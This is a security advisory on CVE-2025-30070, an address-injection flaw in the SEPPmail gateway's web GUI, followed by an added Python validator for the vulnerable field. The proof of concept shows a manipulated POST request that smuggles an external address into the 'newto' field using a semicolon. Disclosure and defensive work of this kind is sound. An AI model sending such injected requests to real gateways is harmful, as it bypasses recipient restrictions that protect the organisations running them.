Advisory ID:               SYSS-2025-003
Product:                   SEPPmail Secure Email Gateway
Manufacturer:              SEPPmail – Deutschland GmbH
Affected Version(s):       <14.0.3
Tested Version(s):         14.0.2
Vulnerability Type:        Improper Neutralization of Argument Delimiters
                           in a Command (CWE-88)
Risk Level:                Medium
Solution Status:           Fix available
Manufacturer Notification: 2025-02-13
Solution Date:             2025-02-25
Public Disclosure:         2025-03-31
CVE Reference:             CVE-2025-30070
Author of Advisory:        Jürgen Zöller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

SEPPmail Secure Email Gateway is an e-mail gateway encompassing, among
other things, a web GUI.

The manufacturer describes the product as follows (see [1]):

"The SEPPmail Secure Email Gateway, which has won several awards,
impresses with its comprehensive functionality, not to mention its
simplicity and flexibility that are second to none. Banks, insurance
companies, lawyers, authorities, stakeholders in the healthcare sector,
industrial companies and energy providers have been using SEPPmail to
secure their electronic business transactions for years. By doing so,
they are benefiting from stability, performance, availability,
functionality and convenience."

Due to insufficient input validation, SEPPmail is vulnerable to address
injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SEPPmail allows registered external users to write e-mails to internal
users via its web GUI. However, external users are not allowed to send
e-mails to addresses at external domains.

Due to insufficient input validation, an external user can inject
external e-mail addresses into the e-mails they create. While such
e-mails might only be delivered to internal users due to mail server
settings, the injected addresses will still, for example, be included
when a recipient responds using the "reply all" functionality.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

It is possible to inject an external e-mail address via the following
steps:

1. Log in to the web GUI as an external user.
2. Send an e-mail to any internal user.
3. Intercept the request between browser and server.
4. Add an external address to the "newto" field, separated from the
   original address by a semicolon (see below).
5. Forward the manipulated request to the server.

The sent e-mail will contain the added address in the "To" field.

Example manipulated request:

POST /web.app HTTP/1.1
Host: seppmail.internal.com
Connection: keep-alive

-----------------------------17008683747387827221288174314
Content-Disposition: form-data; name="submit"

yes
-----------------------------17008683747387827221288174314
[...]
-----------------------------17008683747387827221288174314
Content-Disposition: form-data; name="email"

attacker@external.com
-----------------------------17008683747387827221288174314
Content-Disposition: form-data; name="newto"

injected@external.com;someaddress@internal.com
-----------------------------17008683747387827221288174314
Content-Disposition: form-data; name="recipients[]"

-----------------------------17008683747387827221288174314

This will result in the following e-mail headers:

Received: from seppmail (localhost.seppmail.local [127.0.0.1])
    for someaddress@internal.com; ...
From:
To: injected@external.com, someaddress@internal.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 14.0.4 or higher.

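A server-side check for the "newto" value shown in the PoC, given here as an added example that is not part of the SySS advisory and is not SEPPmail's code. The internal domain set, the function names and the flawed check shown for contrast are assumptions for illustration; the point is that every address a mailer could split out of the field is validated on its own.

```python
import re

# Assumption: the domains the gateway treats as internal.
INTERNAL_DOMAINS = {"internal.com"}
# "newto" value from the advisory's example request.
POC_NEWTO = "injected@external.com;someaddress@internal.com"

# Characters a downstream mailer may treat as separating several addresses.
_SEPARATORS = re.compile(r"[;,\s]+")
# Deliberately conservative address shape: no display names, quotes or comments.
_ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")


def split_recipients(field: str) -> list[str]:
    """Split the submitted field into every address a mailer could see."""
    return [part for part in _SEPARATORS.split(field) if part]


def naive_check(field: str, internal=INTERNAL_DOMAINS) -> bool:
    """Hypothetical flawed check: treats the whole field as one address."""
    return field.rpartition("@")[2].lower() in internal


def validate_recipients(field: str, internal=INTERNAL_DOMAINS) -> list[str]:
    """Return the recipients, or raise ValueError if any single address is
    malformed or belongs to a domain outside the internal set."""
    recipients = []
    for part in split_recipients(field):
        match = _ADDRESS.fullmatch(part)
        if match is None:
            raise ValueError(f"malformed address: {part!r}")
        if match.group(1).lower() not in internal:
            raise ValueError(f"external recipient not allowed: {part!r}")
        recipients.append(part)
    if not recipients:
        raise ValueError("no recipient given")
    return recipients


if __name__ == "__main__":
    print("naive check accepts PoC value:", naive_check(POC_NEWTO))
    try:
        validate_recipients(POC_NEWTO)
    except ValueError as err:
        print("per-address check rejects it:", err)
```
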
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-12-09: Vulnerability discovered
2025-02-13: Vulnerability reported to manufacturer
2025-02-25: Patch released by manufacturer
2025-03-31: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for SEPPmail
    https://www.seppmail.com/products/secure-email-gateway/
[2] SySS Security Advisory SYSS-2025-003
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-003.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Jürgen Zöller of SySS GmbH.

E-Mail: juergen.zoeller@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key ID: 0xA55C06902A34886E
Key Fingerprint: F279 067D A805 F18E BB71 E876 A55C 0690 2A34 886E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en